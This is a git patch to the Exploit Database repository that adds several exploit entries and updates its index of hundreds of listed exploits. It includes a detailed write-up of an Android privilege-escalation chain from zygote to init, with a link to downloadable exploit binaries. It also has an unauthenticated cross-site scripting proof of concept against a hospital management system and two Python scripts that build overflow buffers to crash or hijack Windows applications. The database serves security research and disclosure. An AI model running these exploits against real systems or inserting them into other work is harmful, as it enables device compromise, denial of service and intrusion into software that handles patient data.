From d7fa44945250a0e4a7944c8489121bb41df17fbb Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 12 Sep 2018 05:01:53 +0000 Subject: [PATCH] DB: 2018-09-12 7 changes to exploits/shellcodes Zenmap (Nmap) 7.70 - Denial of Service (PoC) HTML5 Video Player 1.2.5 - Denial of Service (PoC) Zenmap (Nmap) 7.70 - Denial of Service (PoC) InTouch Machine Edition 8.1 SP1 - 'Nombre del Tag' Buffer Overflow (SEH) Android - 'zygote->init;' Chain from USB Privilege Escalation Monstra CMS 3.0.4 - Arbitrary File Upload / Remote Code Execution Monstra CMS 3.0.4 - (Authenticated) Arbitrary File Upload / Remote Code Execution CMS Made Simple 2.2.5 - Remote Code Execution CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution OpenEMR < 5.0.1 - Remote Code Execution OpenEMR < 5.0.1 - (Authenticated) Remote Code Execution Jorani Leave Management 0.6.5 - 'startdate' SQL Injection Jorani Leave Management 0.6.5 - (Authenticated) 'startdate' SQL Injection OpenEMR 5.0.1.3 - Arbitrary File Actions OpenEMR 5.0.1.3 - (Authenticated) Arbitrary File Actions WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection WordPress Plugin Gift Voucher 1.0.5 - (Authenticated) 'template_id' SQL Injection Bayanno Hospital Management System 4.0 - Cross-Site Scripting --- exploits/android/local/45379.txt | 98 +++++++++++++++++++ exploits/php/webapps/45375.txt | 23 +++++ exploits/windows_x86-64/local/45378.py | 25 +++++ exploits/windows_x86/{local => dos}/45357.txt | 0 exploits/windows_x86/dos/45376.py | 28 ++++++ files_exploits.csv | 18 ++-- 6 files changed, 185 insertions(+), 7 deletions(-) create mode 100644 exploits/android/local/45379.txt create mode 100644 exploits/php/webapps/45375.txt create mode 100755 exploits/windows_x86-64/local/45378.py rename exploits/windows_x86/{local => dos}/45357.txt (100%) create mode 100755 exploits/windows_x86/dos/45376.py diff --git a/exploits/android/local/45379.txt b/exploits/android/local/45379.txt new file mode 100644 index 000000000..4f04e88c6 --- /dev/null +++ b/exploits/android/local/45379.txt @@ -0,0 +1,98 @@ +After reporting https://bugs.chromium.org/p/project-zero/issues/detail?id=1583 +(Android ID 80436257, CVE-2018-9445), I discovered that this issue could also +be used to inject code into the context of the zygote. Additionally, I +discovered a privilege escalation path from zygote to init; that escalation path +is why I'm filing a new bug. + +Essentially, the privilege escalation from zygote to init is possible because +system/sepolicy/private/zygote.te contains the following rule: + + allow zygote self:capability sys_admin; + +(On the current AOSP master branch, the rule looks slightly different, but it's +still there.) + +This rule allows processes in the zygote domain to use the CAP_SYS_ADMIN +capability, if they have such a capability. The zygote has the capability and +uses it, e.g. to call umount() and to install seccomp filters without setting +the NO_NEW_PRIVS flag. CAP_SYS_ADMIN is a bit of a catch-all capability: If +kernel code needs to check that the caller has superuser privileges and none of +the capability bits fit the particular case, CAP_SYS_ADMIN is usually used. +The capabilities(7) manpage has a long, but not exhaustive, list of things that +this capability permits: +http://man7.org/linux/man-pages/man7/capabilities.7.html + +One of the syscalls that can be called with CAP_SYS_ADMIN and don't have +significant additional SELinux hooks is pivot_root(). This syscall can be used +to switch out the root of the current mount namespace and, as part of that, +change the root of every process in that mount namespace to the new namespace +root (unless the process already had a different root). + +The exploit for this issue is in zygote_exec_target.c, starting at +"if (unshare(CLONE_NEWNS))". The attack is basically: + +1. set up a new mount namespace with a root that is fully attacker-controlled +2. execute crash_dump64, causing an automatic transition to the crash_dump + domain +3. the kernel tries to load the linker for crash_dump64 from the + attacker-controlled filesystem, resulting in compromise of the crash_dump + domain +4. from the crash_dump domain, use ptrace() to inject syscalls into vold +5. from vold, set up a loop device with an attacker-controlled backing device + and mount the loop device over /sbin, without "nosuid" +6. from vold, call request_key() with a nonexistent key, causing a + usermodehelper invocation to /sbin/request-key, which is labeled as + init_exec, causing an automatic domain transition from kernel to init (and + avoiding the "neverallow kernel *:file { entrypoint execute_no_trans };" + aimed at stopping exploits using usermodehelpers) +7. code execution in the init domain + + +Note that this is only one of multiple possible escalation paths; for example, +I think that you could also enable swap on an attacker-controlled file, then +modify the swapped-out data to effectively corrupt the memory of any userspace +process that hasn't explicitly locked all of its memory into RAM. + + + +In order to get into the zygote in the first place, I have to trigger +CVE-2018-9445 twice: + +1. Use the bug to mount a "public volume" with a FAT filesystem over /data/misc. +2. Trigger the bug again with a "private volume" with a dm-crypt-protected + ext4 filesystem that will be mounted over /data. To decrypt the volume, a key + from /data/misc/vold/ is used. +3. Cause system_server to crash in order to trigger a zygote reboot. For this, + the following exception is targeted: + + *** FATAL EXCEPTION IN SYSTEM PROCESS: NetworkStats + java.lang.NullPointerException: Attempt to get length of null array + at com.android.internal.util.FileRotator.getActiveName(FileRotator.java:309) + at com.android.internal.util.FileRotator.rewriteActive(FileRotator.java:183) + at com.android.server.net.NetworkStatsRecorder.forcePersistLocked(NetworkStatsRecorder.java:300) + at com.android.server.net.NetworkStatsRecorder.maybePersistLocked(NetworkStatsRecorder.java:286) + at com.android.server.net.NetworkStatsService.performPollLocked(NetworkStatsService.java:1194) + at com.android.server.net.NetworkStatsService.performPoll(NetworkStatsService.java:1151) + at com.android.server.net.NetworkStatsService.-wrap3(Unknown Source:0) + at com.android.server.net.NetworkStatsService$HandlerCallback.handleMessage(NetworkStatsService.java:1495) + at android.os.Handler.dispatchMessage(Handler.java:102) + at android.os.Looper.loop(Looper.java:164) + at android.os.HandlerThread.run(HandlerThread.java:65) + + This exception can be triggered by sending >=2MiB (mPersistThresholdBytes) of + network traffic to the device, then either waiting for the next periodic + refresh of network stats or changing the state of a network interface. + +4. The rebooting zygote64 does dlopen() on + /data/dalvik-cache/arm64/system@framework@boot.oat, resulting in code + execution in the zygote64. (For the zygote64 to get to this point, it's + sufficient to symlink + /data/dalvik-cache/arm64/system@framework@boot.{art,vdex} to their + counterparts on /system, even though that code isn't relocated properly.) + +I have attached an exploit for the full chain, with usage instructions in USAGE. + +WARNING: As always, this exploit is intended to be used only on research devices that don't store user data. This specific exploit is known to sometimes cause data corruption. + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45379.zip \ No newline at end of file diff --git a/exploits/php/webapps/45375.txt b/exploits/php/webapps/45375.txt new file mode 100644 index 000000000..7270ff82d --- /dev/null +++ b/exploits/php/webapps/45375.txt @@ -0,0 +1,23 @@ +# Exploit Title: Bayanno Hospital Management System 4.0 - Cross-Site Scripting +# Date: 2018-09-05 +# Software Link: https://codecanyon.net/item/bayanno-hospital-management-system/5814621 +# Exploit Author: Gokhan Sagoglu +# Vendor Homepage:: http://creativeitem.com/ +# Version: v4.0 +# Live Demo: http://creativeitem.com/demo/bayanno/index.php?home +# Category: webapps + +# 1. Description +# Due to improper user input management and lack of output encoding, unauthenticated users are able +# to inject malicious code via making an appointment. Malicious code runs on admin panel. + +# 2. PoC + +- To make an appointment go to: /bayanno/index.php?home/appointment +- Select “New Patient”. +- Type as name. +- Fill the other fields with proper values. +- Click on “Book Now” button. +- Go to admin panel and login as admin: /bayanno/index.php?login +- To view patients go to: /bayanno/index.php?admin/patient +- Malicious script will run. \ No newline at end of file diff --git a/exploits/windows_x86-64/local/45378.py b/exploits/windows_x86-64/local/45378.py new file mode 100755 index 000000000..380605f1a --- /dev/null +++ b/exploits/windows_x86-64/local/45378.py @@ -0,0 +1,25 @@ +# Exploit Title: InTouch Machine Edition 8.1 SP1 - 'Nombre del Tag' Buffer Overflow (SEH) +# Discovery by: Luis Martinez +# Discovery Date: 2018-09-10 +# Vendor Homepage: https://on.wonderware.com/ +# Software Link: https://on.wonderware.com/intouch-machine-edition +# Tested Version: 8.1 SP1 +# Vulnerability Type: Local Buffer Overflow (SEH Unicode) +# Tested on OS: Windows 10 Pro x64 en + +# Steps to Produce the Local Buffer Overflow (SEH Unicode): +# 1.- Run python code: InTouch_Machine_Edition_8.1.py +# 2.- Open InTouch_Machine_Edition_8.1.txt and copy content to clipboard +# 3.- Open ITME v8.1 InTouch Machine Edition +# 4.- Inicio +# 5.- Paste ClipBoard on "Nombre del Tag" + +#!/usr/bin/env python + +nSEH = "\x42\x42" +SEH = "\x43\x43" + +buffer = "\x41" * 1042 + nSEH + SEH +f = open ("InTouch_Machine_Edition_8.1.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows_x86/local/45357.txt b/exploits/windows_x86/dos/45357.txt similarity index 100% rename from exploits/windows_x86/local/45357.txt rename to exploits/windows_x86/dos/45357.txt diff --git a/exploits/windows_x86/dos/45376.py b/exploits/windows_x86/dos/45376.py new file mode 100755 index 000000000..e290b8e55 --- /dev/null +++ b/exploits/windows_x86/dos/45376.py @@ -0,0 +1,28 @@ +# Exploit Title: HTML5 Video Player 1.2.5 - Denial of Service (PoC) +# Date: 2018-09-07 +# Exploit Author: T3jv1l +# Vendor Homepage: http://www.html5videoplayer.net/download.html +# Software: http://www.html5videoplayer.net/html5videoplayer-setup.exe +# Contact: https://twitter.com/T3jv1l +# Version: HTML5 Video Player V.1.2.5 +# Tested on: Windows 7 SP1 x86 + +# PoC: +# 1. Download and install the setup file +# 2. A file "Evil.txt" will be created +# 3. Click Help > Register... in tool bar +# 4. Copy the contents of the file (poc.txt) and paste in the Registration Name field +# 5. Click Activate and BOOMMMM !!!! + +#!/usr/bin/python + +buffer = "\x41" * 4000 +payload = buffer +try: + f=open("poc.txt","w") + print "[+] Creating %s bytes payload..." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index fe401ae36..26463c35f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6095,6 +6095,8 @@ id,file,description,date,author,type,platform,port 45320,exploits/windows/dos/45320.py,"Microsoft Windows Explorer Out-of-Bound Read - Denial of Service (PoC)",2018-09-03,Ghaaf,dos,windows, 45321,exploits/ios/dos/45321.py,"Trend Micro Virtual Mobile Infrastructure 5.5.1336 - 'Server address' Denial of Service (PoC)",2018-09-03,"Luis Martínez",dos,ios, 45324,exploits/windows/dos/45324.py,"Wikipedia 12.0 - Denial of Service (PoC)",2018-09-03,0xB9,dos,windows, +45357,exploits/windows_x86/dos/45357.txt,"Zenmap (Nmap) 7.70 - Denial of Service (PoC)",2018-09-10,"Gionathan Reale",dos,windows_x86, +45376,exploits/windows_x86/dos/45376.py,"HTML5 Video Player 1.2.5 - Denial of Service (PoC)",2018-09-11,T3jv1l,dos,windows_x86, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -9945,9 +9947,10 @@ id,file,description,date,author,type,platform,port 45354,exploits/windows/local/45354.txt,"Microsoft Baseline Security Analyzer 2.3 - XML External Entity Injection",2018-09-10,hyp3rlinx,local,windows, 45355,exploits/windows_x86/local/45355.py,"Flash Slideshow Maker Professional 5.20 - Buffer Overflow (SEH)",2018-09-10,"Shubham Singh",local,windows_x86, 45356,exploits/windows_x86/local/45356.py,"Any Sound Recorder 2.93 - Denial of Service (PoC)",2018-09-10,T3jv1l,local,windows_x86, -45357,exploits/windows_x86/local/45357.txt,"Zenmap (Nmap) 7.70 - Denial of Service (PoC)",2018-09-10,"Gionathan Reale",local,windows_x86, 45369,exploits/linux/local/45369.rb,"Ghostscript - Failed Restore Command Execution (Metasploit)",2018-09-10,Metasploit,local,linux, 45372,exploits/linux/local/45372.txt,"VirtualBox 5.2.6.r120293 - VM Escape",2018-08-28,"Reno Robert",local,linux, +45378,exploits/windows_x86-64/local/45378.py,"InTouch Machine Edition 8.1 SP1 - 'Nombre del Tag' Buffer Overflow (SEH)",2018-09-11,"Luis Martínez",local,windows_x86-64, +45379,exploits/android/local/45379.txt,"Android - 'zygote->init;' Chain from USB Privilege Escalation",2018-09-11,"Google Security Research",local,android, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -39419,7 +39422,7 @@ id,file,description,date,author,type,platform,port 43343,exploits/cgi/webapps/43343.py,"ITGuard-Manager 0.0.0.1 - Remote Code Execution",2017-12-15,"Nassim Asrir",webapps,cgi, 43346,exploits/php/webapps/43346.txt,"Movie Guide 2.0 - SQL Injection",2017-12-15,"Ihsan Sencan",webapps,php,80 43347,exploits/php/webapps/43347.txt,"Ciuis CRM 1.0.7 - SQL Injection",2017-12-18,"Zahid Abbasi",webapps,php, -43348,exploits/php/webapps/43348.txt,"Monstra CMS 3.0.4 - Arbitrary File Upload / Remote Code Execution",2017-12-18,"Ishaq Mohammed",webapps,php, +43348,exploits/php/webapps/43348.txt,"Monstra CMS 3.0.4 - (Authenticated) Arbitrary File Upload / Remote Code Execution",2017-12-18,"Ishaq Mohammed",webapps,php, 43349,exploits/php/webapps/43349.txt,"Cells Blog 3.5 - 'bgid' / 'fmid' / 'fnid' SQL Injection",2017-12-18,"Ihsan Sencan",webapps,php, 44158,exploits/php/webapps/44158.txt,"Joomla! Component CW Tags 2.0.6 - SQL Injection",2018-02-22,"Ihsan Sencan",webapps,php, 44159,exploits/php/webapps/44159.txt,"Joomla! Component Proclaim 9.1.1 - Backup File Download",2018-02-22,"Ihsan Sencan",webapps,php, @@ -39800,7 +39803,7 @@ id,file,description,date,author,type,platform,port 44964,exploits/php/webapps/44964.txt,"Dolibarr ERP/CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80 44973,exploits/lua/webapps/44973.py,"ntop-ng < 3.4.180617 - Authentication Bypass",2018-07-03,"Ioannis Profetis",webapps,lua, 44975,exploits/java/webapps/44975.py,"ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,java,8181 -44976,exploits/php/webapps/44976.py,"CMS Made Simple 2.2.5 - Remote Code Execution",2018-07-04,"Mustafa Hasan",webapps,php, +44976,exploits/php/webapps/44976.py,"CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution",2018-07-04,"Mustafa Hasan",webapps,php, 44977,exploits/php/webapps/44977.txt,"Online Trade - Information Disclosure",2018-07-04,L0RD,webapps,php, 44978,exploits/php/webapps/44978.txt,"ShopNx - Arbitrary File Upload",2018-07-04,L0RD,webapps,php, 45014,exploits/php/webapps/45014.txt,"WAGO e!DISPLAY 7300T - Multiple Vulnerabilities",2018-07-13,"SEC Consult",webapps,php,80 @@ -39813,7 +39816,7 @@ id,file,description,date,author,type,platform,port 44999,exploits/linux/webapps/44999.txt,"Elektronischer Leitz-Ordner 10 - SQL Injection",2018-07-10,"Jens Regel",webapps,linux, 45002,exploits/hardware/webapps/45002.py,"D-Link DIR601 2.02 - Credential Disclosure",2018-07-10,"Thomas Zuk",webapps,hardware, 45003,exploits/php/webapps/45003.txt,"Instagram-Clone Script 2.0 - Cross-Site Scripting",2018-07-11,L0RD,webapps,php, -45161,exploits/php/webapps/45161.py,"OpenEMR < 5.0.1 - Remote Code Execution",2018-08-07,"Cody Zacharias",webapps,php,80 +45161,exploits/php/webapps/45161.py,"OpenEMR < 5.0.1 - (Authenticated) Remote Code Execution",2018-08-07,"Cody Zacharias",webapps,php,80 45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple, 45065,exploits/hardware/webapps/45065.txt,"GeoVision GV-SNVR0811 - Directory Traversal",2018-07-22,"Berk Dusunur",webapps,hardware, 45030,exploits/hardware/webapps/45030.txt,"VelotiSmart WiFi B-380 Camera - Directory Traversal",2018-07-16,"Miguel Mendez Z",webapps,hardware,80 @@ -39852,7 +39855,7 @@ id,file,description,date,author,type,platform,port 45090,exploits/linux/webapps/45090.txt,"Kirby CMS 2.5.12 - Cross-Site Request Forgery (Delete Page)",2018-07-26,"Zaran Shaikh",webapps,linux, 45094,exploits/linux/webapps/45094.txt,"Online Trade 1 - Information Disclosure",2018-07-27,Dhamotharan,webapps,linux, 45338,exploits/php/webapps/45338.txt,"Jorani Leave Management 0.6.5 - Cross-Site Scripting",2018-09-06,"Javier Olmedo",webapps,php,80 -45340,exploits/php/webapps/45340.txt,"Jorani Leave Management 0.6.5 - 'startdate' SQL Injection",2018-09-06,"Javier Olmedo",webapps,php,80 +45340,exploits/php/webapps/45340.txt,"Jorani Leave Management 0.6.5 - (Authenticated) 'startdate' SQL Injection",2018-09-06,"Javier Olmedo",webapps,php,80 45341,exploits/linux/webapps/45341.py,"Apache Roller 5.0.3 - XML External Entity Injection (File Disclosure)",2018-09-06,"Marko Jokic",webapps,linux, 45342,exploits/hardware/webapps/45342.txt,"WirelessHART Fieldgate SWG70 3.0 - Directory Traversal",2018-09-06,"Hamit CİBO",webapps,hardware, 45097,exploits/php/webapps/45097.txt,"SoftNAS Cloud < 4.0.3 - OS Command Injection",2018-07-27,"Core Security",webapps,php, @@ -39892,7 +39895,7 @@ id,file,description,date,author,type,platform,port 45196,exploits/windows/webapps/45196.rb,"Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)",2018-08-14,Metasploit,webapps,windows,4848 45198,exploits/linux/webapps/45198.rb,"Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)",2018-08-14,"Dhiraj Mishra",webapps,linux, 45200,exploits/cgi/webapps/45200.txt,"ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection",2018-08-15,"Kyle Lovett",webapps,cgi,8001 -45202,exploits/linux/webapps/45202.txt,"OpenEMR 5.0.1.3 - Arbitrary File Actions",2018-08-16,"Joshua Fam",webapps,linux, +45202,exploits/linux/webapps/45202.txt,"OpenEMR 5.0.1.3 - (Authenticated) Arbitrary File Actions",2018-08-16,"Joshua Fam",webapps,linux, 45201,exploits/hardware/webapps/45201.txt,"ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass",2018-08-15,AmnBAN,webapps,hardware, 45206,exploits/php/webapps/45206.txt,"WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection",2018-08-16,"Javier Olmedo",webapps,php, 45208,exploits/php/webapps/45208.txt,"Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2018-08-16,"SEC Consult",webapps,php,80 @@ -39913,7 +39916,7 @@ id,file,description,date,author,type,platform,port 45252,exploits/hardware/webapps/45252.txt,"Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)",2018-08-24,cakes,webapps,hardware, 45253,exploits/php/webapps/45253.txt,"UltimatePOS 2.5 - Remote Code Execution",2018-08-25,"Renos Nikolaou",webapps,php, 45254,exploits/windows/webapps/45254.txt,"ManageEngine ADManager Plus 6.5.7 - HTML Injection",2018-08-25,"Ismail Tasdelen",webapps,windows, -45255,exploits/php/webapps/45255.txt,"WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection",2018-08-26,"Renos Nikolaou",webapps,php,80 +45255,exploits/php/webapps/45255.txt,"WordPress Plugin Gift Voucher 1.0.5 - (Authenticated) 'template_id' SQL Injection",2018-08-26,"Renos Nikolaou",webapps,php,80 45256,exploits/windows_x86-64/webapps/45256.txt,"ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting",2018-08-26,"Ismail Tasdelen",webapps,windows_x86-64,8080 45258,exploits/php/webapps/45258.txt,"Gleez CMS 1.2.0 - Cross-Site Request Forgery (Add Admin)",2018-08-27,GunEggWang,webapps,php,443 45264,exploits/hardware/webapps/45264.txt,"RICOH MP C4504ex Printer - Cross-Site Request Forgery (Add Admin)",2018-08-27,"Ismail Tasdelen",webapps,hardware,80 @@ -39944,3 +39947,4 @@ id,file,description,date,author,type,platform,port 45348,exploits/hardware/webapps/45348.txt,"QNAP Photo Station 5.7.0 - Cross-Site Scripting",2018-09-07,"Mitsuaki Shiraishi",webapps,hardware, 45351,exploits/hardware/webapps/45351.py,"LW-N605R 12.20.2.1486 - Remote Code Execution",2018-09-10,"Nassim Asrir",webapps,hardware, 45361,exploits/linux/webapps/45361.py,"RPi Cam Control < 6.4.25 - 'preview.php' Remote Command Execution",2018-09-04,"Reigning Shells",webapps,linux, +45375,exploits/php/webapps/45375.txt,"Bayanno Hospital Management System 4.0 - Cross-Site Scripting",2018-09-11,"Gokhan Sagoglu",webapps,php,